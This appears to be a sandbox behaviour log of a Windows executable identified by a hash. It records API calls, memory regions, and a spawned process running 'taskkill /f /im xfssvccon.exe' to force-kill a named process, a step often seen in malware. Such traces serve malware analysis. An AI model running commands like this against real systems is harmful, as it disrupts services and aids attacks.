GetProcessHeap () returned 0x530000 [0168.280] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x58) returned 0x53ac70 [0168.280] GetProcessHeap () returned 0x530000 [0168.280] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1a) returned 0x53acd0 [0168.281] GetProcessHeap () returned 0x530000 [0168.281] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x36) returned 0x53acf8 [0168.282] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0168.286] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0168.286] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0168.286] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0168.286] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0168.286] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0168.286] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0168.286] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0168.286] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0168.286] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0168.286] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0168.286] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0168.286] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0168.286] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0168.286] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0168.286] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0168.286] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0168.286] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0168.286] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0168.286] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0168.286] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0168.286] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0168.286] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0168.286] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0168.287] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0168.287] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0168.287] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0168.287] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0168.287] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0168.287] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0168.287] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0168.287] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0168.287] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0168.287] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0168.287] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0168.287] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0168.287] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0168.287] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0168.287] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0168.287] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0168.287] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0168.287] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0168.287] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0168.287] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0168.287] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0168.287] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0168.287] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0168.287] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0168.287] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0168.287] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0168.287] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0168.287] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0168.287] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0168.287] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0168.287] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0168.287] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0168.287] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0168.288] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0168.288] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0168.288] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0168.288] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0168.288] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0168.288] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0168.288] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0168.288] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0168.288] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0168.288] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0168.288] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0168.288] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0168.288] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0168.288] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0168.288] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0168.288] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0168.288] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0168.288] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0168.288] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0168.288] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0168.288] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0168.288] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0168.288] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0168.288] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0168.288] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0168.288] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0168.288] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0168.289] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0168.289] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0168.289] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0168.289] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0168.289] GetProcessHeap () returned 0x530000 [0168.289] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x210) returned 0x53ad38 [0168.289] GetProcessHeap () returned 0x530000 [0168.289] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x53af50 [0168.289] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0168.290] GetProcessHeap () returned 0x530000 [0168.290] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x418) returned 0x5305c8 [0168.290] SetErrorMode (uMode=0x0) returned 0x8003 [0168.290] SetErrorMode (uMode=0x1) returned 0x0 [0168.290] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5305d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0168.290] SetErrorMode (uMode=0x8003) returned 0x1 [0168.290] GetProcessHeap () returned 0x530000 [0168.290] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5305c8, Size=0x56) returned 0x5305c8 [0168.290] GetProcessHeap () returned 0x530000 [0168.290] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5305c8) returned 0x56 [0168.290] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0168.290] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0168.291] GetProcessHeap () returned 0x530000 [0168.291] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x110) returned 0x53afa0 [0168.291] GetProcessHeap () returned 0x530000 [0168.291] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x218) returned 0x53b0b8 [0168.297] GetProcessHeap () returned 0x530000 [0168.297] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x53b0b8, Size=0x112) returned 0x53b0b8 [0168.297] GetProcessHeap () returned 0x530000 [0168.297] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x53b0b8) returned 0x112 [0168.297] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0168.297] GetProcessHeap () returned 0x530000 [0168.297] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe0) returned 0x53b1d8 [0168.299] GetProcessHeap () returned 0x530000 [0168.300] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x53b1d8, Size=0x76) returned 0x53b1d8 [0168.300] GetProcessHeap () returned 0x530000 [0168.300] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x53b1d8) returned 0x76 [0168.300] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.300] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0168.300] GetLastError () returned 0x2 [0168.300] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.300] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x53b258 [0168.301] GetProcessHeap () returned 0x530000 [0168.301] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x14) returned 0x5377e0 [0168.301] FindClose (in: hFindFile=0x53b258 | out: hFindFile=0x53b258) returned 1 [0168.301] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0168.301] GetLastError () returned 0x2 [0168.301] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x53b258 [0168.301] GetProcessHeap () returned 0x530000 [0168.301] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5377e0, Size=0x4) returned 0x537288 [0168.301] FindClose (in: hFindFile=0x53b258 | out: hFindFile=0x53b258) returned 1 [0168.302] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0168.302] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0168.302] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0168.310] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0168.310] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0168.311] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c)) [0168.311] GetProcessHeap () returned 0x530000 [0168.311] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x537820 [0168.311] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.311] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.331] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.332] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.332] GetProcessHeap () returned 0x530000 [0168.332] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x537820) returned 1 [0168.332] GetProcessHeap () returned 0x530000 [0168.332] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa) returned 0x53b258 [0168.332] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0168.337] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im xfssvccon.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im xfssvccon.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im xfssvccon.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x10b4, dwThreadId=0x1038)) returned 1 [0168.376] CloseHandle (hObject=0x98) returned 1 [0168.376] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0168.376] GetProcessHeap () returned 0x530000 [0168.377] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x539e60) returned 1 [0168.377] GetEnvironmentStringsW () returned 0x539e60* [0168.377] GetProcessHeap () returned 0x530000 [0168.377] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa76) returned 0x537fe8 [0168.377] FreeEnvironmentStringsA (penv="=") returned 1 [0168.377] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0169.780] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0169.780] CloseHandle (hObject=0x9c) returned 1 [0169.781] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0169.781] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0169.783] GetProcessHeap () returned 0x530000 [0169.783] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x537fe8) returned 1 [0169.783] GetEnvironmentStringsW () returned 0x53b288* [0169.783] GetProcessHeap () returned 0x530000 [0169.783] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa9c) returned 0x537fe8 [0169.783] FreeEnvironmentStringsA (penv="=") returned 1 [0169.783] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0169.784] GetProcessHeap () returned 0x530000 [0169.784] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x537fe8) returned 1 [0169.784] GetEnvironmentStringsW () returned 0x53b288* [0169.784] GetProcessHeap () returned 0x530000 [0169.784] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa9c) returned 0x537fe8 [0169.784] FreeEnvironmentStringsA (penv="=") returned 1 [0169.784] GetProcessHeap () returned 0x530000 [0169.784] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x53b258) returned 1 [0169.784] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0169.784] _get_osfhandle (_FileHandle=1) returned 0x130 [0169.784] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0169.785] _get_osfhandle (_FileHandle=1) returned 0x130 [0169.785] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0169.785] _get_osfhandle (_FileHandle=0) returned 0x158 [0169.785] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0169.785] GetConsoleOutputCP () returned 0x1b5 [0169.786] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0169.786] SetThreadUILanguage (LangId=0x0) returned 0x409 [0169.787] exit (_Code=128) Thread: id = 199 os_tid = 0x108c Process: id = "31" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x315ea000" os_pid = "0x10b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x510" cmd_line = "taskkill /f /im xfssvccon.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2538 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2539 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2540 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2541 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 2542 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2543 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 2544 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 2545 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2546 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2547 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2548 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2549 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2550 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2551 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2552 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2553 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2554 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2555 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2556 start_va = 0x44e0000 end_va = 0x44effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 2557 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2558 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2559 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2560 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2561 start_va = 0x44f0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 2562 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2563 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2564 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2565 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2566 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2567 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2568 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2569 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2570 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2571 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 2572 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2573 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2574 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id 